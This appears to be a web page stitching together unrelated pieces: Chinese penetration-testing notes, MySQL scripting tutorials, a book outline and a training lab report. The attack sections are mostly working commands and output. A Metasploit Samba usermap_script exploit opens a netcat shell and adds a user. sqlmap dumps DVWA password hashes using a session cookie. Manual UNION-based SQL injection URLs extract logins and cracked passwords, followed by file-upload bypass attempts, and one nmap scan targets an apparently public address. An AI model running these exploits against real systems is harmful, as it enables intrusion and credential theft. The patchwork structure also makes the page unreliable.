from mysql to shell: penetration testing notes
Basic Tutorial on Network Intrusion and Penetration

Many people want to learn the basics of hacking and become computer experts, but cannot find a tutorial. Here this site presents the intrusion and penetration tutorial from its hacking basics series, in the hope that it helps.
One passive operating-system identification method is to monitor the network packets exchanged between systems and infer the target's operating system from them. The tool siphon was used for this kind of testing. It works as follows, judging mainly from four fields of the TCP/IP headers:
1. TTL: the time-to-live of outbound packets;
2. Window size: the TCP window size;
3. DF: whether the Don't Fragment bit is set;
4. TOS: whether a type of service is set.
Combining these values gives a rough guess at the target's system, but never a 100% certain one.
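As an added example (not part of the original tutorial), the following helper pulls the four fields named above out of `tcpdump -v` text and guesses the sender's initial TTL, the most stable of the four; the function name and the sample records are constructed here, and a live run would be `tcpdump -nv 'tcp[tcpflags] & tcp-syn != 0' | fingerprint_stream`.

```shell
#!/bin/sh
# Added example, not from the original tutorial: passive fingerprinting from the
# TTL, window size, DF and TOS fields of captured SYN packets, as an analyst
# would do when inventorying hosts from a capture. Names below are constructed.
set -eu

# fingerprint_stream: reads tcpdump -v output on stdin and prints one summary line
# per packet. tcpdump prints the IP header and the TCP segment on two lines, so
# indented continuation lines are glued to the preceding header line first.
fingerprint_stream() {
    awk '
    # value following "key " in s (e.g. "ttl 63," -> "63"), or "" when absent
    function field(s, key) {
        if (match(s, key " [^ ,)]+"))
            return substr(s, RSTART + length(key) + 1, RLENGTH - length(key) - 1)
        return ""
    }
    function fingerprint(s,    ttl, win, tos, df, init, guess) {
        ttl = field(s, "ttl"); win = field(s, "win"); tos = field(s, "tos")
        df = (index(s, "[DF]") > 0) ? 1 : 0
        if (ttl == "") return "unparsed: " s
        # stacks start at 64, 128 or 255 and decrement once per hop, so the
        # smallest bucket at or above the observed value is the likely start;
        # window/DF/TOS are printed so they can be compared with a signature table
        if (ttl + 0 <= 64)       { init = 64;  guess = "Linux/BSD/macOS-like" }
        else if (ttl + 0 <= 128) { init = 128; guess = "Windows-like" }
        else                     { init = 255; guess = "Solaris/Cisco-like" }
        return "ttl=" ttl " initial_ttl=" init " hops=" (init - ttl) " win=" win " df=" df " tos=" tos " guess=" guess
    }
    function flush() { if (buf != "") print fingerprint(buf); buf = "" }
    /^[ \t]/ { buf = buf " " $0; next }   # continuation line: append to record
             { flush(); buf = $0 }         # new timestamped line: start a record
    END      { flush() }'
}

# Constructed sample (not a real capture): two SYNs as tcpdump -v prints them.
SAMPLE='11:02:03.000001 IP (tos 0x0, ttl 63, id 41215, offset 0, flags [DF], proto TCP (6), length 60)
    192.0.2.10.51512 > 198.51.100.7.443: Flags [S], seq 1, win 64240, options [mss 1460,sackOK,nop,wscale 7], length 0
11:02:04.000002 IP (tos 0x0, ttl 126, id 7, offset 0, flags [DF], proto TCP (6), length 52)
    192.0.2.11.49321 > 198.51.100.7.443: Flags [S], seq 2, win 65535, options [mss 1460,nop,wscale 8,sackOK], length 0'

# fingerprint_sample: runs the helper over the constructed sample.
fingerprint_sample() { printf '%s\n' "$SAMPLE" | fingerprint_stream; }
```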
Step one of an intrusion: enumeration. Enumeration yields more, and more specific, useful information than the techniques above, for example account information.
1. Windows enumeration relies on NetBIOS. NetBIOS sits on top of TCP/IP and defines several TCP and UDP ports.
TCP:
(1) 139: nbsession: NetBIOS session. For example: `net use \\IP\ipc$ "" /user:""`
(2) 42: WINS: Windows Internet Name Service (UDP port 42 as well).
UDP:
(1) 137: nbname: name query. For example: `nbtstat -A IP` (the <03> entries show either the computer name or a user name).
(2) 138: nbdatagram: UDP datagram service. For example: `net send /d:domain-name "Hello"`
Obtaining user names relies on the IPC$ null session and the sid tools.
The sid tools consist of two small utilities: user2sid obtains the SID of a user or group name; sid2user takes a SID and returns the corresponding user or group name. A SID is created when the user is created and is the equivalent of a UID on UNIX; Windows checks permissions by checking SIDs.
Using Shell Scripts for Database Operations

Shell script is a scripting language that runs on Unix, Linux and other operating systems and helps automate all kinds of tasks.
In database administration and operations, shell scripts also play an important role.
This article introduces how to use shell scripts for database operations, including connecting to a database, executing SQL statements, and importing and exporting data.

1. Connecting to the database

Before using a shell script for database operations, you first need to connect to the database.
Different database systems may have different connection commands; the following uses MySQL as the example.
To connect to a MySQL database, you can use the following script:

```shell
#!/bin/bash
# Credentials for the MySQL connection
MYSQL_USER="your_username"
MYSQL_PASSWORD="your_password"
# -u: user name, -p: password (no space after -p), -e: SQL statement to run
mysql -u "$MYSQL_USER" -p"$MYSQL_PASSWORD" -e "use your_database"
```

The script above first defines two variables, `MYSQL_USER` and `MYSQL_PASSWORD`, holding the database user name and password.
It then connects with the `mysql` command, using `-u` to specify the user name, `-p` to specify the password, and `-e` to execute the given SQL statement.
`use your_database` is just an example; replace it with the database you actually want to connect to.

2. Executing SQL statements

After connecting, we can use shell scripts to execute all kinds of SQL statements, such as creating tables, inserting data, updating data and so on.

```shell
#!/bin/bash
MYSQL_USER="your_username"
MYSQL_PASSWORD="your_password"
# Several statements can be passed to -e, separated by semicolons
mysql -u "$MYSQL_USER" -p"$MYSQL_PASSWORD" -e "use your_database; create table your_table (id int, name varchar(255)); insert into your_table values (1, 'John'); select * from your_table"
```

The script above, after connecting, executes three SQL statements: it creates the table `your_table`, inserts one row, and then queries the table's data.
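The two scripts above pass the password as `-p$MYSQL_PASSWORD`, which any local user can read from `ps` while the client runs. As an added example (not the article's own code), the same create/insert/select batch below keeps the credentials in a mode-0600 option file read via `--defaults-extra-file` and feeds the SQL on stdin; the user, password and database names are placeholders, and the `mysql` client is assumed to be installed.

```shell
#!/bin/bash
# Added example, not part of the original article: run the batch without
# exposing the password on the command line. Placeholders below are assumptions.
set -eu

MYSQL_USER="your_username"
MYSQL_PASSWORD="your_password"
MYSQL_DB="your_database"

# write_defaults_file DIR: create DIR/my.cnf holding the [client] credentials,
# readable only by the current user, and print its path.
write_defaults_file() {
    file="$1/my.cnf"
    (
        umask 077   # the redirection below then creates the file as 0600
        printf '[client]\nuser=%s\npassword=%s\n' "$MYSQL_USER" "$MYSQL_PASSWORD" > "$file"
    )
    printf '%s\n' "$file"
}

# run_batch DEFAULTS_FILE: run the statements against $MYSQL_DB.
# --defaults-extra-file must be the first option; --batch gives tab-separated
# output suitable for scripts. With `set -e`, a failing statement aborts the
# script instead of being silently ignored.
run_batch() {
    mysql --defaults-extra-file="$1" --batch "$MYSQL_DB" <<'SQL'
CREATE TABLE IF NOT EXISTS your_table (id INT PRIMARY KEY, name VARCHAR(255));
INSERT INTO your_table VALUES (1, 'John');
SELECT * FROM your_table;
SQL
}

# main: keep the credentials file in a private temp directory that is removed
# on exit, whether the batch succeeds or fails.
main() {
    tmpdir="$(mktemp -d)"
    trap 'rm -rf "$tmpdir"' EXIT
    run_batch "$(write_defaults_file "$tmpdir")"
}

# Run with MYSQL_BATCH_RUN=1 after filling in the placeholders above.
if [ "${MYSQL_BATCH_RUN:-0}" = "1" ]; then
    main
fi
```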
MySQL Shell usage

MySQL Shell is an interactive command-line tool for interacting with and managing MySQL databases.
It provides a powerful environment in which you can run SQL queries, create, modify and drop database objects, and perform administrative tasks.
First, we need to know how to connect to a MySQL database.
Enter the following on the command line:

```shell
mysqlsh --uri=user:password@host:port
```

Here user is the database user name, password is the password, host is the host name or IP address of the database server, and port is the database server's port number.
Once connected, you will see the MySQL Shell prompt.
Next, we can run various SQL queries and operations.
Some basic usage:

1. Running SQL queries: you can type SQL statements such as SELECT, INSERT, UPDATE and DELETE directly to query and manipulate the database.
For example, to query all rows of a table:

```sql
SELECT * FROM table_name;
```

2. Creating and modifying database objects: with the CREATE, ALTER and DROP keywords you can create, modify and drop objects such as tables, indexes, views and stored procedures.
For example, to create a new table:

```sql
CREATE TABLE table_name (column1 datatype, column2 datatype, ...);
```

3. Switching databases: use the USE command to switch to a different database.
For example, to switch to the database named "database_name":

```sql
USE database_name;
```

4. Importing and exporting data: LOAD DATA INFILE imports data from a file into a table, and SELECT ... INTO OUTFILE exports query results to a file.
For example, to import a CSV file into a table:

```sql
LOAD DATA INFILE 'filename.csv' INTO TABLE table_name FIELDS TERMINATED BY ',' LINES TERMINATED BY '\n';
```

5. Exiting MySQL Shell: type exit or quit.
How to use MySQL Shell

MySQL Shell is a command-line tool for connecting to and managing MySQL databases.
Here are some ways to use MySQL Shell:

1. Start MySQL Shell: type `mysqlsh` on the command line and press Enter.

2. Connect to a MySQL database: inside MySQL Shell, connect with:

```
\connect username@hostname:port
```

Here username is the database user name, hostname is the database server's host name, and port is its port number.
If you are connecting to a local database, username, hostname and port can be omitted.

3. Submit SQL queries: once connected, use SQL queries to operate on the database.
For example, run a SELECT query:

```sql
SELECT * FROM table_name;
```

Here table_name is the name of the table to query.

4. Exit MySQL Shell: inside MySQL Shell, exit with:

```
\q
```

5. Use JavaScript scripts: MySQL Shell also supports operating on the database with JavaScript scripts.
You can write a JavaScript script inside MySQL Shell and run it with:

```
\source /path/to/script.js
```

Here /path/to/script.js is the path of the script file.
Beyond these basics, MySQL Shell offers many other features, such as transaction management and user management.
Use the help command to see more commands and usage information.
Besides the command-line tool, MySQL Shell also provides an interactive interface: enter SQL mode with the `\sql` command, or JavaScript mode with the `\js` command.
MySQL Shell syntax

MySQL Shell is MySQL's new-generation client tool. It interacts in Python, JavaScript and SQL, supports running SQL queries and JavaScript and Python scripts, and can also be used to manage MySQL instances, clusters, backups and so on.
Common MySQL Shell syntax:

1. Connect to a MySQL instance:

```shell
mysqlsh
```

- user: the MySQL user name
- hostname: the host name of the MySQL instance
- port: the port number of the MySQL instance
- -p: connect with an interactive password prompt

2. Run SQL queries:

```
mysqlsh> \sql
mysql-sql> SHOW DATABASES;
```

3. Run JavaScript and Python:

```
mysqlsh> \js
mysql-js> \py
mysql-py> print("Hello, World!")
```

4. Show the MySQL Shell version and connection status:

```
mysqlsh> \status
```

5. Show help:

```
mysqlsh> \help
```

6. Exit MySQL Shell:

```
mysqlsh> \q
```

These are the commonly used MySQL Shell commands; see the official documentation for more syntax and usage.
Penetration Testing Lab Report (China Mobile Security Department)

Penetration testing training, March 13, day one: summary of the main experiments. First, a Struts2 vulnerability was used to execute arbitrary commands directly and take control of the host.

Lab environment: Kali Linux as the attack tool; OWASP, 2003 and Metasploitable as targets, with successful access confirmed. Metasploit was used to attack the target's Samba service and obtain shell access:

- search samba: find the modules
- use multi/samba/usermap_script: select the exploit module
- show payloads: list the payloads compatible with this exploit module
- set payload cmd/unix/bind_netcat: use netcat to run a shell after successful exploitation
- show options: show the parameters that need to be set
- set RHOST 10.10.10.254: set the target host
- exploit: launch the attack

1. First install the VM software, start Kali, OWASP and Metasploitable, and build the environment so that the network is reachable; NAT mode was chosen, with the address range 10.10.10.0/24.

2. Start the Kali VM, switch to root, enter msfconsole, and change the initial password to 123456:

```
msf > passwd
[*] exec: passwd
输入新的UNIX 密码:
重新输入新的UNIX 密码:
passwd:已成功更新密码
```

Then look for the Samba modules:

```
msf > search samba
Matching Modules
================
   Name                                             Disclosure Date  Rank       Description
   ----                                             ---------------  ----       -----------
   auxiliary/admin/smb/samba_symlink_traversal                       normal     Samba Symlink Directory Traversal
   auxiliary/dos/samba/lsa_addprivs_heap                             normal     Samba lsa_io_privilege_set Heap Overflow
   auxiliary/dos/samba/lsa_transnames_heap                           normal     Samba lsa_io_trans_names Heap Overflow
   auxiliary/dos/samba/read_nttrans_ea_list                          normal     Samba read_nttrans_ea_list Integer Overflow
   exploit/freebsd/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (*BSD x86)
   exploit/linux/samba/chain_reply                  2010-06-16       good       Samba chain_reply Memory Corruption (Linux x86)
   exploit/linux/samba/lsa_transnames_heap          2007-05-14       good       Samba lsa_io_trans_names Heap Overflow
   exploit/linux/samba/setinfopolicy_heap           2012-04-10       normal     Samba SetInformationPolicy AuditEventsInfo Heap Overflow
   exploit/linux/samba/trans2open                   2003-04-07       great      Samba trans2open Overflow (Linux x86)
   exploit/multi/samba/nttrans                      2003-04-07       average    Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
   exploit/multi/samba/usermap_script               2007-05-14       excellent  Samba "username map script" Command Execution
   exploit/osx/samba/lsa_transnames_heap            2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/osx/samba/trans2open                     2003-04-07       great      Samba trans2open Overflow (Mac OS X PPC)
   exploit/solaris/samba/lsa_transnames_heap        2007-05-14       average    Samba lsa_io_trans_names Heap Overflow
   exploit/solaris/samba/trans2open                 2003-04-07       great      Samba trans2open Overflow (Solaris SPARC)
   exploit/unix/misc/distcc_exec                    2002-02-01       excellent  DistCC Daemon Command Execution
   exploit/unix/webapp/citrix_access_gateway_exec   2010-12-21       excellent  Citrix Access Gateway Command Execution
   exploit/windows/http/sambar6_search_results      2003-06-21       normal     Sambar 6 Search Results Buffer Overflow
   exploit/windows/license/calicclnt_getconfig      2005-03-02       average    Computer Associates License Client GETCONFIG Overflow
   post/linux/gather/enum_configs                                    normal     Linux Gather Configurations

msf > use multi/samba/usermap_script
msf exploit(usermap_script) > show payloads
Compatible Payloads
===================
   Name                                 Disclosure Date  Rank    Description
   ----                                 ---------------  ----    -----------
   cmd/unix/bind_awk                                     normal  Unix Command Shell, Bind TCP (via AWK)
   cmd/unix/bind_inetd                                   normal  Unix Command Shell, Bind TCP (inetd)
   cmd/unix/bind_lua                                     normal  Unix Command Shell, Bind TCP (via Lua)
   cmd/unix/bind_netcat                                  normal  Unix Command Shell, Bind TCP (via netcat)
   cmd/unix/bind_netcat_gaping                           normal  Unix Command Shell, Bind TCP (via netcat -e)
   cmd/unix/bind_netcat_gaping_ipv6                      normal  Unix Command Shell, Bind TCP (via netcat -e) IPv6
   cmd/unix/bind_perl                                    normal  Unix Command Shell, Bind TCP (via Perl)
   cmd/unix/bind_perl_ipv6                               normal  Unix Command Shell, Bind TCP (via perl) IPv6
   cmd/unix/bind_ruby                                    normal  Unix Command Shell, Bind TCP (via Ruby)
   cmd/unix/bind_ruby_ipv6                               normal  Unix Command Shell, Bind TCP (via Ruby) IPv6
   cmd/unix/bind_zsh                                     normal  Unix Command Shell, Bind TCP (via Zsh)
   cmd/unix/generic                                      normal  Unix Command, Generic Command Execution
   cmd/unix/reverse                                      normal  Unix Command Shell, Double Reverse TCP (telnet)
   cmd/unix/reverse_awk                                  normal  Unix Command Shell, Reverse TCP (via AWK)
   cmd/unix/reverse_lua                                  normal  Unix Command Shell, Reverse TCP (via Lua)
   cmd/unix/reverse_netcat                               normal  Unix Command Shell, Reverse TCP (via netcat)
   cmd/unix/reverse_netcat_gaping                        normal  Unix Command Shell, Reverse TCP (via netcat -e)
   cmd/unix/reverse_openssl                              normal  Unix Command Shell, Double Reverse TCP SSL (openssl)
   cmd/unix/reverse_perl                                 normal  Unix Command Shell, Reverse TCP (via Perl)
   cmd/unix/reverse_perl_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via perl)
   cmd/unix/reverse_php_ssl                              normal  Unix Command Shell, Reverse TCP SSL (via php)
   cmd/unix/reverse_python                               normal  Unix Command Shell, Reverse TCP (via Python)
   cmd/unix/reverse_python_ssl                           normal  Unix Command Shell, Reverse TCP SSL (via python)
   cmd/unix/reverse_ruby                                 normal  Unix Command Shell, Reverse TCP (via Ruby)
   cmd/unix/reverse_ruby_ssl                             normal  Unix Command Shell, Reverse TCP SSL (via Ruby)
   cmd/unix/reverse_ssl_double_telnet                    normal  Unix Command Shell, Double Reverse TCP SSL (telnet)
   cmd/unix/reverse_zsh                                  normal  Unix Command Shell, Reverse TCP (via Zsh)

msf exploit(usermap_script) > set payload cmd/unix/bind_netcat
payload => cmd/unix/bind_netcat
msf exploit(usermap_script) > show options
msf exploit(usermap_script) > set RHOST 10.10.10.254
RHOST => 10.10.10.254
msf exploit(usermap_script) > exploit
[*] Started bind handler
[*] Command shell session 1 opened (10.10.10.128:56558 -> 10.10.10.254:4444) at 2015-03-13 16:06:40 +0800
```

Control of the 10.10.10.254 machine has been obtained, so users can be added: `useradd test` succeeded.

Host discovery: `-PU -sn` is a UDP ping that does not list services; `-Pn` skips the ping.

- `nmap -sS -Pn xx.xx.xx.xx`: TCP SYN scan without sending ICMP
- `nmap -sV -Pn xx.xx.xx.xx`: list detailed service information
- `nmap -PO -script=smb-check-vulns xx.xx.xx.xx`: look for the MS08-067 vulnerability

nmap site scan:

```
msf > nmap
msf > nmap -sV -Pn 10.10.10.254
[*] exec: nmap -sV -Pn 10.10.10.254
Starting Nmap 6.46 ( ) at 2015-03-13 16:38 CST
Nmap scan report for 10.10.10.254
Host is up (0.00020s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)
Service detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.84 seconds
msf > nmap -PO -script=smb-check-vulns 10.10.10.254
[*] exec: nmap -PO -script=smb-check-vulns 10.10.10.254
Starting Nmap 6.46 ( ) at 2015-03-13 16:47 CST
Nmap scan report for 10.10.10.254
Host is up (0.00021s latency).
All 1000 scanned ports on 10.10.10.254 are filtered
MAC Address: 00:50:56:E7:1B:31 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 23.06 seconds
```

```
msf > nmap -O 
[*] exec: nmap -O 
Starting Nmap 6.46 ( ) at 2015-03-13 17:16 CST
Nmap scan report for  (211.100.35.132)
Host is up (0.0054s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE
80/tcp open  http
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Brother MFC-7820N printer (94%), Digi Connect ME serial-to-Ethernet bridge (94%), Netgear SC101 Storage Central NAS device (91%), ShoreTel ShoreGear-T1 VoIP switch (91%), Aastra 480i IP Phone or Sun Remote System Control (RSC) (91%), Aastra 6731i VoIP phone or Apple AirPort Express WAP (91%), Cisco Wireless IP Phone 7920-ETSI (91%), GoPro HERO3 camera (91%), Konica Minolta bizhub 250 printer (91%), Linux 2.4.26 (Slackware 10.0.0) (86%)
No exact OS matches for host (test conditions non-ideal).
OS detection performed. Please report any incorrect results at /submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.88 seconds
msf > use auxiliary/scanner/http/dir_scanner
msf auxiliary(dir_scanner) > set THREADS 50
THREADS => 50
msf auxiliary(dir_scanner) > set RHOSTS 
RHOSTS => 
msf auxiliary(dir_scanner) > run
[*] Detecting error code
[*] Detecting error code
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
```

sqlmap: checking for SQL injection vulnerabilities. With the cookie supplied, find the user names and passwords in this site's database:

```
root@kali:~# sqlmap
root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23"

sqlmap/1.0-dev - automatic SQL injection and database takeover tool

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:50:20

[11:50:20] [INFO] testing connection to the target URL
[11:50:20] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:50:21] [INFO] target URL is stable
[11:50:21] [INFO] testing if GET parameter 'id' is dynamic
[11:50:21] [INFO] confirming that GET parameter 'id' is dynamic
[11:50:21] [INFO] GET parameter 'id' is dynamic
[11:50:21] [INFO] heuristics detected web page charset 'ascii'
[11:50:21] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:50:21] [INFO] testing for SQL injection on GET parameter 'id'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n] y
[11:50:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:50:25] [WARNING] reflective value(s) found and filtering out
[11:50:25] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:50:25] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[11:50:25] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[11:50:25] [INFO] testing 'MySQL inline queries'
[11:50:25] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[11:50:25] [WARNING] time-based comparison requires larger statistical model, please wait...........
[11:50:25] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[11:50:25] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[11:50:36] [INFO] GET parameter 'id' seems to be 'MySQL > 5.0.11 AND time-based blind' injectable
[11:50:36] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[11:50:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:50:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:50:36] [INFO] target URL appears to have 2 columns in query
[11:50:36] [INFO] GET parameter 'id' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 41 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4334=4334 AND 'iasX'='iasX&Submit=Submit

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=1' AND (SELECT 4941 FROM(SELECT COUNT(*),CONCAT(0x71626e6f71,(SELECT (CASE WHEN (4941=4941) THEN 1 ELSE 0 END)),0x7163716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'zAHU'='zAHU&Submit=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: id=1' UNION ALL SELECT NULL,CONCAT(0x71626e6f71,0x4b497150534967787451,0x7163716271)#&Submit=Submit

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'xfNp'='xfNp&Submit=Submit
---
[11:50:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[11:50:40] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/10.10.10.129'

[*] shutting down at 11:50:40
```

Listing the databases shows the following:

```
root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id --dbs
[11:53:32] [WARNING] reflective value(s) found and filtering out
available databases [2]:
[*] dvwa
[*] information_schema
```

Looking at the dvwa database:

```
root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa --tables
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users     |
+-----------+
root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users --columns
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column     | Type        |
+------------+-------------+
| user       | varchar(15) |
| avatar     | varchar(70) |
| first_name | varchar(15) |
| last_name  | varchar(15) |
| password   | varchar(32) |
| user_id    | int(6)      |
+------------+-------------+
root@kali:~# sqlmap -u "http://10.10.10.129/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=lu1d2nfdvfkgkc8fa628c0vh23" -p id -D dvwa -T users -C user,password --dump
Database: dvwa
Table: users
[5 entries]
+---------+--------------------------------------------+
| user    | password                                   |
+---------+--------------------------------------------+
| 1337    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| admin   | 21232f297a57a5a743894a0e4a801fc3 (admin)   |
| gordonb | e99a18c428cb38d5f260853678922e03 (abc123)  |
| pablo   | 0d107d09f5bbe40cade3de5c71e9e9b7           |
| smithy  | 5f4dcc3b5aa765d61d8327deb882cf99           |
+---------+--------------------------------------------+
```

It can be seen that the user name is admin and the password is admin. Success.

Day 2

Intelligence gathering: whois queries domain registration information.
Notes on 《Web安全攻防:渗透测试实战指南》 (Web Security Attack and Defense: A Practical Guide to Penetration Testing)

Reading record of 《Web安全攻防:渗透测试实战指南》

Contents

1. Fundamentals
  1.1 Overview of web security
    1.1.1 Definition of web security
    1.1.2 Importance of web security
  1.2 Overview of penetration testing
    1.2.1 Definition of penetration testing
    1.2.2 Purpose of penetration testing
    1.2.3 Penetration testing process
2. Techniques
  2.1 Web application security testing
    2.1.1 SQL injection attacks
    2.1.2 Cross-site scripting attacks
    2.1.3 File upload vulnerabilities
  2.2 Operating system security testing
    2.2.1 Operating system version vulnerabilities
    2.2.2 Operating system permission settings
  2.3 Network security testing
    2.3.1 Network port scanning
    2.3.2 Network service identification
3. Tools
  3.1 Introduction to penetration testing tools
  3.2 Tool usage and tips
    3.2.1 Kali Linux installation and configuration
    3.2.2 Getting started with Metasploit
    3.2.3 Wireshark tips
4. Practice
  4.1 Enterprise website penetration test case
    4.1.1 Vulnerability discovery and exploitation
    4.1.2 Backdoor planting and persistence
    4.1.3 Privilege escalation and lateral movement
  4.2 Website hardening recommendations
    4.2.1 Parameterized queries or stored-procedure restrictions
    4.2.2 Error message handling
    4.2.3 Input validation and filtering
5. Laws and policies
  5.1 National cybersecurity laws
    5.1.1 Cybersecurity Law of the People's Republic of China
    5.1.2 Interpretation of related regulations
  5.2 Enterprise security policies and standards
    5.2.1 Enterprise information security policy
    5.2.2 Security operating procedures
6. Conclusion
  6.1 Study summary
  6.2 Suggestions for further study

Part 1: Fundamentals

Before diving into web security attack and defense, we need to understand some basics.
Web security is the process of protecting web applications from unauthorized access, tampering or data leakage.
Penetration Notes Compilation

91ri penetration notes compilation [Penetration Notes] (1)

1. The best way to avoid 0-day attacks is to implement heuristic or profile-based intrusion detection systems.
2. Common security certifications include CCIE: Security, CEH, CISSP, CCSP, GIAC, OPSTA and Security+.
3. Nmap scanning of open ports can trigger a DoS on OpenBSD 2.7 systems running IPSec. Running Nmap with the -sO option crashes the OpenBSD system.
4. Port scanning is currently known to trigger DoS in the following environments: Efficient Networks routers, pcAnywhere 9.0, and Windows 95/98 with the Novell intraNetWare Client installed.
5. Wetware: the human factor in computing.
6. Passive reconnaissance: user group meetings, information on websites, the EDGAR database, social-engineering databases, UUNet newsgroups, business partners, dumpster diving, social engineering. Active reconnaissance: port scanning, DNS queries, zone transfers, ping sweeps, traceroute, OS fingerprinting.
7. Types of port scans: TCP connect() scan, SYN scan, NULL scan, FIN scan, ACK scan, Xmas-Tree scan, Dumb scan, Reverse Ident scan.
8. Gray-box testing: the tester simulates an internal employee. They are given an internal network account and the standard means of accessing the network. This test evaluates attacks from the company's own staff.
9. In netcat, port 53 is often used for listening because that port is assigned to DNS and firewalls usually leave it open. If another, less common port is chosen, the firewall may block that traffic.
10. The core statement of blind injection: php?id=1 and (select ord(mid(group_concat(SCHEMA_NAME),20,1))from information_schema.schemata)>0
11. VLAN hopping attacks exploit DTP.
http://192.168.128.128/

- `http://192.168.128.128/cat.php?id=1%27`: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
- `telnet 192.168.128.128 80`
- `http://192.168.128.128/cat.php?id=2%20order%20by%203#`: displays normally
- `http://192.168.128.128/cat.php?id=2%20order%20by%204#`: displays normally
- `http://192.168.128.128/cat.php?id=2%20order%20by%205#`: Unknown column '5' in 'order clause'
- `http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4`: displays all pages
- `http://192.168.128.128/cat.php?id=2%20union%20select%201,2,3,4,5`: The used SELECT statements have a different number of columns
- `http://192.168.128.128/cat.php?id=2%20union%20select%20user(),database(),version(),4`: displays all pages, but without the user() etc. information
- `http://192.168.128.128/cat.php?id=1%20union%20select%20user(),database(),@@version,current_user()`: displays all pages, but without the user() etc. information
- `http://192.168.128.128/cat.php?id=1%20union%20select%201,tablename,3,4%20from%20information_schema.tables`: Unknown column 'tablename' in 'field list'
- `http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.tables`: (output: one "picture:" entry per table name, all of information_schema's tables followed by the application's own tables categories, pictures and users)
- `http://192.168.128.128/cat.php?id=1%20union%20select%201,column_name,3,4%20from%20information_schema.columns`: (output: one "picture:" entry per column name, ending with the application's own columns id, title, img, cat, login and password)
- `http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,3,4%20from%20information_schema.columns`: returns a pile of information
- `http://192.168.128.128/cat.php?id=1%20union%20select%201,table_name,column_name,4%20from%20information_schema.columns`: returns a pile of information

Join them together with concat(table_name,%27:%27,column_name):

- `http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(table_name,%27:%27,column_name),3,4%20from%20information_schema.columns`: returns many table_name:column_name pairs, among them users:id, users:login and users:password
- `http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(login,%27:%27,password),`
- `http://192.168.128.128/cat.php?id=1%20union%20select%201,concat(id,%27:%27,login,%27:%2`

Looked up at /md5-decrypter.aspx: 8efe310f9ab3efeae8d410a8e0166eb2 MD5 : P4ssw0rd

Log in to the admin backend and upload test1.php3: INSERT INTO pictures (title, img, cat) VALUES ('','test1.php3','1'
Upload test2.php.aaa: INSERT INTO pictures (title, img, cat) VALUES ('test','test2.php.aaa','1')
